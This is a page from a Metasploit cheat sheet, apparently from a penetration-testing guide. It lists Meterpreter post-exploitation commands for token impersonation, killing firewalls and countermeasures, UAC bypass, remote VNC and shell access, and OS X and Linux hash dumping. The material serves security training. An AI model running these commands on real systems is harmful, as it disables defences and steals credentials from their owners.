Cheat Sheet
283
meterpreter >
list_tokens -u
meterpreter >
impersonate_token IHAZSECURITY\\Administrator
See what protection mechanisms are in place on the compromised
target, display the help menu, disable Windows Firewall, and kill all counter-
measures found:
meterpreter >
run getcountermeasure
meterpreter >
run getcountermeasure -h
meterpreter >
run getcountermeasure -d -k
Identify whether the compromised system is a virtual machine:
meterpreter >
run checkvm
Drop into a command shell for a current Meterpreter console session:
meterpreter >
shell
Get a remote GUI (VNC) on the target machine:
meterpreter >
run vnc
Background a currently running Meterpreter console:
meterpreter >
background
Bypass Windows User Access Control:
meterpreter >
run post/windows/escalate/bypassuac
Dump Hashes on an OS X system:
meterpreter >
run post/osx/gather/hashdump
Dump Hashes on a Linux system:
meterpreter >
run post/linux/gather/hashdump